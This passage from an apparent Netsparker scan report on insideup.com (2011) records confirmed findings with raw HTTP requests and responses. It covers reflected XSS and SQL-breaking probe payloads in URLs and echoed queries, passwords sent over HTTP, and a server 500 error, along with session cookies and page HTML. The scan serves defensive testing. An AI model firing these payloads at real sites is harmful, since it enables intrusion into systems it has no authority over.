cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/project_dynamic_page_updated.php'"--></style></script><script>netsparker(0x001435)</script>' OR prj.project_page_url = 'leadflow/project_dynamic_page_updated.php'"--></style></script><script>netsparker(0x001435)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/project_dynamic_page_updated.php'"--></style></script><script>netsparker(0x001435)</script>' OR prj.project_page_url = 'leadflow/project_dynamic_page_updated.php'"--></style></script><script>netsparker(0x001435)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id 
= prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/project_dynamic_page_updated.php'"--></style></script><script>netsparker(0x001435)</script>' OR prj.project_page_url = 'leadflow/project_dynamic_page_updated.php'"--></style></script><script>netsparker(0x001435)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/project_dynamic_page_updated.php'"--></style></script><script>netsparker(0x001435)</script>' OR prj.project_page_url = 'leadflow/project_dynamic_page_updated.php'"--></style></script><script>netsparker(0x001435)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x001435)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/css/styles.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001460)%3C/script%3E

/ppc/leadflow/css/styles.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001460)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/css/styles.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x001460)</script>

Request

GET /ppc/leadflow/css/styles.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001460)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=10EE3C024CDA7B812FDA17514DAD67F9; OAID=796794e69a8753089a41044ffcc41718; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2228%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A51%3A%22http%3A%2F%2Fwww.insideup.com%2Fcompetitivecomparision.html%22%3B%7D; PHPSESSID=clomsmsqh2pged90sbte0bi9i7
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:42 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 3023
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/styles.css'"--></style></script><script>netsparker(0x001460)</script>' OR prj.project_page_url = 'leadflow/css/styles.css'"--></style></script><script>netsparker(0x001460)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/styles.css'"--></style></script><script>netsparker(0x001460)</script>' OR prj.project_page_url = 'leadflow/css/styles.css'"--></style></script><script>netsparker(0x001460)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/styles.css'"--></style></script><script>netsparker(0x001460)</script>' OR prj.project_page_url = 'leadflow/css/styles.css'"--></style></script><script>netsparker(0x001460)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/css/styles.css'"--></style></script><script>netsparker(0x001460)</script>' OR prj.project_page_url = 'leadflow/css/styles.css'"--></style></script><script>netsparker(0x001460)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/styles.css'"--></style></script><script>netsparker(0x001460)</script>' OR prj.project_page_url = 'leadflow/css/styles.css'"--></style></script><script>netsparker(0x001460)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x001460)</script>/' union select prj.catI' at line 5
Password Transmitted Over HTTP

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic, he/she can steal users' credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /selectvendors.html

/selectvendors.html CONFIRMED

http://www.insideup.com/selectvendors.html

Form target action

Request

GET /selectvendors.html HTTP/1.1
Referer: http://www.insideup.com/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=F53C9933FE14A39B648D7D0BA68B6BA5
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:15:15 GMT
Server: Apache/2.2.9 (Fedora)
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; 
padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. 
Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" 
onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Select Vendor',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" 
onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_1" style="margin-top:6px;"> <div> <div class="vendorCategoriesContanier" style="height: 210px;"> <h1 style="background-color:#f2f2f2;font-size:16px;"> Save Up to 60% on Services for Your Business <br/> <span style="font-size:14px;color:#f16913">Select Category to Get Free, No Obligation Quotes from Vendor</span> </h1> <ul class="vendorCategoriesBody"> <li><a href="http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc" title="Web Site Design" target="_new">Web Site Design</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId=110009&iusrc=iupsc" title="Business Phone Systems" target="_new">Business Phone Systems</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId=80005&iusrc=iupsc" title="Logo Design" target="_new">Logo Design</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/meac00/project.php?catId=30008&iusrc=iupsc" title="Credit Card Processing" target="_new">Credit Card Processing</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc" title="Incorporation" target="_new">Incorporation</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc" title="Business Loans" target="_new">Business Loans</a></li> 
<li><a href="http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId=80011&iusrc=iupsc" title="Outbound Telemarketing" target="_new">Outbound Telemarketing</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/parl00/project.php?catId=10002&iusrc=iupsc" title="Payroll Services" target="_new">Payroll Services</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/lodi00/project.php?catId=110003&iusrc=iupsc" title="Long Distance Services" target="_new">Long Distance Services</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc" title="Direct Mail Services" target="_new">Direct Mail Services</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc" title="Business Cash Advance" target="_new">Business Cash Advance</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/onad00/project.php?catId=80003&iusrc=iupsc" title="Internet Marketing Services" target="_new">Internet Marketing Services</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/weho00/project.php?catId=20003&iusrc=iupsc" title="Web Hosting" target="_new">Web Hosting</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc" title="Health Insurance" target="_new">Health Insurance</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc" title="Call Center Services" target="_new">Call Center Services</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc" title="Internet Access" target="_new">Internet Access</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/resf00/project.php?catId=40001&iusrc=iupsc" title="HR Outsourcing" target="_new">HR Outsourcing</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc" title="Collection Agencies" target="_new">Collection Agencies</a></li> <li><a 
href="http://www.insideup.com/ppc/leadflow/voip00/project.php?catId=110005&iusrc=iupsc" title="Business VoIP" target="_new">Business VoIP</a></li> <li><a href="http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc" title="Accounting and Bookkeeping" target="_new">Accounting and Bookkeeping</a></li> <br class="clear" /> </ul> </div> </div> <div style="margin-top:20px;"><img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map"> <map name="Map"> <area shape="rect" coords="1,-1,185,65" href="https://twitter.com/VendorSourcing" target="_blank"> <area shape="rect" coords="197,1,381,63" href="http://www.youtube.com/insideupvendors" target="_blank"> <area shape="rect" coords="390,2,578,64" href="http://insideup.com/blogs/b2bsourcing" target="_blank"> </map> </div> <div class="clear"></div> <div class="grid_2" style="margin-left:0px;margin-top:20px;"> <a href="http://itunes.apple.com/app/insideup-vendor-quotes/id381971606?mt=8#i" target="_new"><img src="/images/iPhone-Banner.jpg"></a> </div> <div class="grid_3" style="margin-top:20px;"> <div class="vendorArticle"> <iframe src="http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FInsi..
Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The server responded with an HTTP status 500, which indicates a server-side error. The causes vary, so the behaviour should be analysed carefully. If Netsparker is able to find a security issue in the same resource, it reports that as a separate vulnerability.

Impact

The impact varies with the underlying cause. Generally a 500 response indicates poor coding practices: insufficient error checking, sanitization and whitelisting. There may, however, be a bigger issue such as SQL Injection; if that is the case, Netsparker checks for other possible issues and reports them separately.

Remedy

Analyse this issue and review the application code so that unexpected errors are handled. This should be a generic practice that does not disclose further information upon an error; all errors should be handled server-side only.
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Request

GET /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=F53C9933FE14A39B648D7D0BA68B6BA5; OAID=98176d5cda925cc255264f2e6b81597a; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; PHPSESSID=bevcehsdjrij0b7vbkc95loq47
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Request processing failed; nested exception is java.lang.NullPointerException
Date: Wed, 20 Apr 2011 02:15:23 GMT
Server: Apache/2.2.9 (Fedora)
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Error Page',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <div id="midSecContainer" align="center" style="padding:40px 0 0 0;"> <div> <h4><img src="/images/errorIcon.gif" align="absmiddle" 
style="padding-right:10px;"/>Sorry! Some unexpected error has occurred. Please try again.</h4> </div></div><div style="margin-left:2px; padding-bottom:20px;"><img src="/images/Footer1.png" /></div>
